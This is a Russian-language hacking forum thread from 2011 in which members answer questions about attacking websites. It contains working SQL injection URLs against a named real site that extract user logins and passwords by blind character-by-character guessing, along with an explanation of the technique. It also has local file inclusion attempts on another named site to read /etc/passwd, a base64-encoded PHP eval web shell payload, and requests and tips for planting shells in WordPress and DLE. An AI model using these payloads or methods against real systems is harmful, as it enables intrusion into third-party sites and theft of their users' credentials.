Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    M_script, зачем переменные? Можно и без них обойтись...
    ReV0LVeR, синтаксис if такой:
    Code:
    if(условие,1,0)
    Тоесть то же, что, например, на пхп выглядит так:
    PHP:
    if(условие)
      return 
    1;
    else
      return 
    0;
    Таким образом, если условие == true, то результат будет 1, если же нет - то false.
    Покажу пример:
    Code:
    http://divantvplus.ru/index.html?id=390 and 1=2 union select 1,2,3,4,5,if([U][B]2=3-1[/B][/U],6,0),7,8,9,10,11--
    Условие - то, что подчёркнуто и выделено, т.е. 2 = 3 - 1. Естественно, что это правда (true), и поэтому, в 6 колонку подставится значение 6. Если бы это была ложь (false) - вернулся бы 0, и, соответственно, страница бы не загрузилась.

    Code:
    http://divantvplus.ru/index.html?id=390 and 1=2 union select 1,2,3,4,5,if(1=2,6,0),7,8,9,10,11--
    А дальше идёт посимвольный перебор значений. Об этом читай на ачате =)
     
    3 people like this.
  2. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,185
    Likes Received:
    618
    Reputations:
    690
    Code:
    http://divantvplus.ru/index.html?id=390 and ascii(substring((SELECT concat(sys_users.user_id,0x3a,sys_users.user_name,0x3a,sys_users.super,0x3a,sys_users.admin,0x3a,sys_users.user_login,0x3a,sys_users.user_password) FROM divantvplus.sys_users LIMIT [B]1,1),16,1))<79[/B]
    тут все таблы нужные вытащенные посимвольным перебором, остальное перебирай дальше сам...
    P.S как я показал.
     
    _________________________
    #16922 shell_c0de, 5 Jun 2011
    Last edited: 5 Jun 2011
  3. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Для сокращения длины запроса. Потому что 4 различных состояния страницы, а не 2
    PHP:
    if(x>2) {
       if(
    x>3) {
          return 
    4;
       }
       else {
          return 
    3;
       }
    }
    else {
       if(
    x>1) {
          return 
    2
       
    }
       else {
          return 
    1;
       }
    }
     
  4. Kuteke

    Kuteke Banned

    Joined:
    26 Jun 2010
    Messages:
    179
    Likes Received:
    26
    Reputations:
    6
    В последнее время много шелов на wordpress 3.1.1! Поделитесь способом!
     
  5. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Где много?
     
  6. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Один символ, начиная с первого.
    2,1 - один символ, начиная со второго.
    1,2 - два символа, начиная с первого.
    Середина диапазона 0-255.
    Середина диапазона 128-255. Это условие проверяется, если первое условие x>128 выполнено.
    Середина диапазона 0-128. Это условие проверяется, если первое условие x>128 не выполнено.
    Значения 0,1,5,6 попадая в поле 6 запроса дают различный вывод страницы.
    Если выводится страница, соответсвующая 0, код символа находится в первом диапазоне 196-255
    Если выводится страница, соответсвующая 1, код символа находится во втором диапазоне 128-196
    Если выводится страница, соответсвующая 5, код символа находится в третьем диапазоне 64-128
    Если выводится страница, соответсвующая 6, код символа находится в четвертом диапазоне 0-64

    Найденный первым запросом диапазон так же делится на 4 части (в примере - 64-80, 80-96, 96-112, 112-128). Такое деление продолжается до тех пор, пока диапазон не будет ограничен одним числом.
    Диапазон 0-255 я привел для примера, так как он универсальный. На практике все зависит от того, какое значение нужно получить.
     
  7. Kuteke

    Kuteke Banned

    Joined:
    26 Jun 2010
    Messages:
    179
    Likes Received:
    26
    Reputations:
    6
    Поделитесь способом заливки шела на WP 3.1.1! Попугай, в интернете :)
     
  8. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Да способы не изменились в принципе - правка шаблонов, правка плагинов, загрузка файлов(не всегда прокатывает) :)
     
    1 person likes this.
  9. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Я, так понимаю, он просит зиродэй плоенты под вп 3.1.1, а не сам процесс заливки шелла ))
     
  10. Kuteke

    Kuteke Banned

    Joined:
    26 Jun 2010
    Messages:
    179
    Likes Received:
    26
    Reputations:
    6
    Да, да!
     
    1 person likes this.
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886

    в паблике ничего серезного нету, разве что тока пассивка xss

    баги надо искать в сторонных компонентах
     
    _________________________
  12. Oro4imaru

    Oro4imaru New Member

    Joined:
    17 Jul 2010
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    как залить шелл через шаблон. на дле 8.5? и можно ли это сделать? в сет есть несколько вариантов как это сделать но пока ни один не помог
     
  13. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Это инклюд?

     
  14. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Ну так даже в ошибке же написано о_0

    http://www.guitars.ru/01/info.php?z828'z../../../../../../../../../../../var/www/mstia/data/www/guitars.ru/01/info.php

    Увы, но allow_url_include там off...

    http://www.guitars.ru/01/info.php?data:;base64,PD9waHAgZXZhbCgkX0dFVFtjbWRdKTsgPz4=

    Вот, советую к прочтению: http://www.xakep.ru/post/49508/default.asp
     
    #16934 Tigger, 5 Jun 2011
    Last edited: 5 Jun 2011
    1 person likes this.
  15. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Почему /etc/passwd не выводится?

    http://www.guitars.ru/01/info.php?z828'z../../../../../../../../../../../etc/passwd%00
     
  16. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Null-байт там не нужен, ничего же не добавляеться.

    /etc/passwd - не читает потому что там написано, что не разрешено выполнять инклюд данного файла "Operation not permitted".
     
    #16936 Tigger, 5 Jun 2011
    Last edited: 5 Jun 2011
  17. Lasteeck

    Lasteeck *ersguterjunge*

    Joined:
    5 Apr 2010
    Messages:
    172
    Likes Received:
    109
    Reputations:
    6
    почему именно столько диров + к ним еще документ рут?
    ваще не могу понять как вычислить длину этих диров ../../ :confused:
     
  18. White Bear

    White Bear New Member

    Joined:
    3 Apr 2011
    Messages:
    10
    Likes Received:
    4
    Reputations:
    0
    ../ эта штука на сколько каталогов надо подняться наверх
    например есть сайт
    site.ru/article.php?list=1
    и такой путь до article
    /usr/www/site.com/article

    надо подняться на 4 каталога вверх

    Вообще почитай об иерархии файлов в nix системах
     
  19. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Зато там есть форум. Где твоя смекалка?
     
  20. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Я думал в этой теме на вопросы отвечают, а тут надо шелл на все сайты подряд заливать, да? ;)
     
Thread Status:
Not open for further replies.